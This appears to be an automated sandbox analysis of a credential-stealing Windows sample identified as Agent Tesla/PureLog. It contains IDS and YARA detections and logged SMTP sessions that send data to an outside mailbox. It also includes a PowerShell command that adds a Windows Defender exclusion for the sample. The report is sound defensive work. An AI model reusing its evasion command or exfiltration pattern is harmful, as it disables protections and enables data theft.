                                                                            SSDEEP:12288:LKbUmJCQ7VRKSynEJFuR6g28pXYC5kBB+Fh+YDliuXci7o/zrj68p+zBh3HG8kR:LKbUnQBcSynEJF428pB5kBX+liuXL8/X
                                                                            TLSH:0FE4231853A9D362CEF6CB36167D32034B72728AA821FE565ED672E74685B400F0397F
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................
                                                                            Icon Hash:90cececece8e8eb0
                                                                            Entrypoint:0x4ad21e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0xC0ACD5FF [Tue Jun 7 19:14:07 2072 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                            Signature Valid:false
                                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                            Error Number:-2146869232
                                                                            Not Before, Not After
                                                                            • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                            Subject Chain
                                                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                            Version:3
                                                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                            Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
                                                                            xor al, 47h
                                                                            xor al, 51h
                                                                            aaa
                                                                            cmp byte ptr [ecx+49h], al
                                                                            inc edi
                                                                            xor al, 50h
                                                                            xor bl, byte ptr [ecx+34h]
                                                                            aaa
                                                                            cmp byte ptr [32383847h], dh
                                                                            xor eax, 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xad1ca0x4f.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x5ac.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xabe000x3608
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xab5a80x70.text
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000xab23c0xab40086c846b00fbc199a5e30b8d96e654635False0.9693601733576642data7.974500592117059IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xae0000x5ac0x6006d4bbf58f0a6d34c073ae2063640d08dFalse0.4212239583333333data4.085549072640651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xb00000xc0x200ae82923f53b11b09a83f3a48e6d4f19bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_VERSION0xae0900x31cdata0.4334170854271357
                                                                            RT_MANIFEST0xae3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain
                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            02/27/24-10:09:05.706606TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49739587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:05.706606TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49739587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:05.706606TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49739587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:05.706606TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249739587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:05.706606TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49739587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:03.953321TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49735587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:03.953263TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49735587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:03.953321TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49735587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:03.953321TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49735587192.168.2.450.87.139.143
                                                                            02/27/24-10:09:03.953321TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249735587192.168.2.450.87.139.143
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Feb 27, 2024 10:08:59.083657026 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:08:59.083735943 CET44349734104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:08:59.083890915 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:08:59.098213911 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:08:59.098290920 CET44349734104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:08:59.370372057 CET44349734104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:08:59.370578051 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:08:59.378566980 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:08:59.378618002 CET44349734104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:08:59.379386902 CET44349734104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:08:59.425168991 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:08:59.467266083 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:08:59.513938904 CET44349734104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:08:59.653796911 CET44349734104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:08:59.653865099 CET44349734104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:08:59.653949022 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:08:59.660218000 CET49734443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:00.542268991 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:00.726023912 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:00.726121902 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:02.235981941 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.236061096 CET44349738104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:09:02.236138105 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.241971016 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.242046118 CET44349738104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:09:02.506288052 CET44349738104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:09:02.506520987 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.507819891 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.507870913 CET44349738104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:09:02.508408070 CET44349738104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:09:02.565788984 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.615430117 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.626132965 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:02.626365900 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:02.657949924 CET44349738104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:09:02.801162958 CET44349738104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:09:02.801309109 CET44349738104.26.12.205192.168.2.4
                                                                            Feb 27, 2024 10:09:02.801493883 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.804112911 CET49738443192.168.2.4104.26.12.205
                                                                            Feb 27, 2024 10:09:02.809456110 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:02.810695887 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:02.993978977 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:02.994275093 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.218972921 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.354856014 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.363054037 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.363245964 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.536906004 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.537007093 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.545798063 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.545972109 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.546128988 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.769212008 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.769783020 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.769928932 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.952470064 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.952768087 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:03.953263044 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.953320980 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.953351974 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:03.953372955 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:04.135966063 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:04.139240026 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:04.205096006 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:04.561156034 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:04.561393023 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:04.744641066 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:04.744879961 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:04.927278042 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:04.927584887 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:05.116369963 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:05.116612911 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:05.298774958 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:05.299921036 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:05.521856070 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:05.523408890 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:05.523597956 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:05.705425024 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:05.705705881 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:05.706605911 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:05.706605911 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:05.706707954 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:05.706708908 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:09:05.888572931 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:05.890171051 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:09:05.940676928 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:10:40.253422976 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:10:40.478811026 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:10:40.641856909 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:10:40.641954899 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:10:40.642102003 CET49735587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:10:40.824937105 CET5874973550.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:10:43.378597021 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:10:43.602840900 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:10:43.763777018 CET5874973950.87.139.143192.168.2.4
                                                                            Feb 27, 2024 10:10:43.763993025 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:10:43.763993025 CET49739587192.168.2.450.87.139.143
                                                                            Feb 27, 2024 10:10:43.945801020 CET5874973950.87.139.143192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Feb 27, 2024 10:08:58.935795069 CET5924653192.168.2.41.1.1.1
                                                                            Feb 27, 2024 10:08:59.059974909 CET53592461.1.1.1192.168.2.4
                                                                            Feb 27, 2024 10:09:00.235292912 CET5016153192.168.2.41.1.1.1
                                                                            Feb 27, 2024 10:09:00.541310072 CET53501611.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Feb 27, 2024 10:08:58.935795069 CET192.168.2.41.1.1.10xb49aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                            Feb 27, 2024 10:09:00.235292912 CET192.168.2.41.1.1.10xf091Standard query (0)mail.elec-qatar.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Feb 27, 2024 10:08:59.059974909 CET1.1.1.1192.168.2.40xb49aNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                            Feb 27, 2024 10:08:59.059974909 CET1.1.1.1192.168.2.40xb49aNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                            Feb 27, 2024 10:08:59.059974909 CET1.1.1.1192.168.2.40xb49aNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                            Feb 27, 2024 10:09:00.541310072 CET1.1.1.1192.168.2.40xf091No error (0)mail.elec-qatar.com50.87.139.143A (IP address)IN (0x0001)false
                                                                            • api.ipify.org
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449734104.26.12.2054437872C:\Users\user\Desktop\Order 19A20060.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-02-27 09:08:59 UTC155OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                            Host: api.ipify.org
                                                                            Connection: Keep-Alive
                                                                            2024-02-27 09:08:59 UTC211INHTTP/1.1 200 OK
                                                                            Date: Tue, 27 Feb 2024 09:08:59 GMT
                                                                            Content-Type: text/plain
                                                                            Content-Length: 12
                                                                            Connection: close
                                                                            Vary: Origin
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Server: cloudflare
                                                                            CF-RAY: 85bf49504b300849-IAD
                                                                            2024-02-27 09:08:59 UTC12INData Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30
                                                                            Data Ascii: 89.149.18.20


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449738104.26.12.2054431236C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-02-27 09:09:02 UTC155OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                            Host: api.ipify.org
                                                                            Connection: Keep-Alive
                                                                            2024-02-27 09:09:02 UTC211INHTTP/1.1 200 OK
                                                                            Date: Tue, 27 Feb 2024 09:09:02 GMT
                                                                            Content-Type: text/plain
                                                                            Content-Length: 12
                                                                            Connection: close
                                                                            Vary: Origin
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Server: cloudflare
                                                                            CF-RAY: 85bf4963ead20828-IAD
                                                                            2024-02-27 09:09:02 UTC12INData Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30
                                                                            Data Ascii: 89.149.18.20


                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                            Feb 27, 2024 10:09:02.626132965 CET5874973550.87.139.143192.168.2.4220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 27 Feb 2024 02:09:02 -0700
                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                            220 and/or bulk e-mail.
                                                                            Feb 27, 2024 10:09:02.626365900 CET49735587192.168.2.450.87.139.143EHLO 124406
                                                                            Feb 27, 2024 10:09:02.809456110 CET5874973550.87.139.143192.168.2.4250-box2248.bluehost.com Hello 124406 [89.149.18.20]
                                                                            250-SIZE 52428800
                                                                            250-8BITMIME
                                                                            250-PIPELINING
                                                                            250-PIPECONNECT
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-STARTTLS
                                                                            250 HELP
                                                                            Feb 27, 2024 10:09:02.810695887 CET49735587192.168.2.450.87.139.143AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                                                            Feb 27, 2024 10:09:02.993978977 CET5874973550.87.139.143192.168.2.4334 UGFzc3dvcmQ6
                                                                            Feb 27, 2024 10:09:03.363054037 CET5874973550.87.139.143192.168.2.4235 Authentication succeeded
                                                                            Feb 27, 2024 10:09:03.363245964 CET49735587192.168.2.450.87.139.143MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                                                            Feb 27, 2024 10:09:03.545972109 CET5874973550.87.139.143192.168.2.4250 OK
                                                                            Feb 27, 2024 10:09:03.546128988 CET49735587192.168.2.450.87.139.143RCPT TO:<richcompaniesltd@gmail.com>
                                                                            Feb 27, 2024 10:09:03.769783020 CET5874973550.87.139.143192.168.2.4250 Accepted
                                                                            Feb 27, 2024 10:09:03.769928932 CET49735587192.168.2.450.87.139.143DATA
                                                                            Feb 27, 2024 10:09:03.952768087 CET5874973550.87.139.143192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                            Feb 27, 2024 10:09:03.953372955 CET49735587192.168.2.450.87.139.143.
                                                                            Feb 27, 2024 10:09:04.139240026 CET5874973550.87.139.143192.168.2.4250 OK id=1retSR-001bNm-2m
                                                                            Feb 27, 2024 10:09:04.561156034 CET5874973950.87.139.143192.168.2.4220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 27 Feb 2024 02:09:04 -0700
                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                            220 and/or bulk e-mail.
                                                                            Feb 27, 2024 10:09:04.561393023 CET49739587192.168.2.450.87.139.143EHLO 124406
                                                                            Feb 27, 2024 10:09:04.744641066 CET5874973950.87.139.143192.168.2.4250-box2248.bluehost.com Hello 124406 [89.149.18.20]
                                                                            250-SIZE 52428800
                                                                            250-8BITMIME
                                                                            250-PIPELINING
                                                                            250-PIPECONNECT
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-STARTTLS
                                                                            250 HELP
                                                                            Feb 27, 2024 10:09:04.744879961 CET49739587192.168.2.450.87.139.143AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                                                            Feb 27, 2024 10:09:04.927278042 CET5874973950.87.139.143192.168.2.4334 UGFzc3dvcmQ6
                                                                            Feb 27, 2024 10:09:05.116369963 CET5874973950.87.139.143192.168.2.4235 Authentication succeeded
                                                                            Feb 27, 2024 10:09:05.116612911 CET49739587192.168.2.450.87.139.143MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                                                            Feb 27, 2024 10:09:05.298774958 CET5874973950.87.139.143192.168.2.4250 OK
                                                                            Feb 27, 2024 10:09:05.299921036 CET49739587192.168.2.450.87.139.143RCPT TO:<richcompaniesltd@gmail.com>
                                                                            Feb 27, 2024 10:09:05.523408890 CET5874973950.87.139.143192.168.2.4250 Accepted
                                                                            Feb 27, 2024 10:09:05.523597956 CET49739587192.168.2.450.87.139.143DATA
                                                                            Feb 27, 2024 10:09:05.705705881 CET5874973950.87.139.143192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                            Feb 27, 2024 10:09:05.706708908 CET49739587192.168.2.450.87.139.143.
                                                                            Feb 27, 2024 10:09:05.890171051 CET5874973950.87.139.143192.168.2.4250 OK id=1retST-001bRG-1y
                                                                            Feb 27, 2024 10:10:40.253422976 CET49735587192.168.2.450.87.139.143QUIT
                                                                            Feb 27, 2024 10:10:40.641856909 CET5874973550.87.139.143192.168.2.4221 box2248.bluehost.com closing connection
                                                                            Feb 27, 2024 10:10:43.378597021 CET49739587192.168.2.450.87.139.143QUIT
                                                                            Feb 27, 2024 10:10:43.763777018 CET5874973950.87.139.143192.168.2.4221 box2248.bluehost.com closing connection

                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:10:08:54
                                                                            Start date:27/02/2024
                                                                            Path:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Imagebase:0xbf0000
                                                                            File size:717'832 bytes
                                                                            MD5 hash:3C162B1CAA9B65084775199AF23B06DE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1682578950.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1682974196.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1678263931.0000000003458000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1679354233.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1678263931.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1678263931.0000000003496000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe
                                                                            Imagebase:0xa10000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:10:08:56
                                                                            Start date:27/02/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
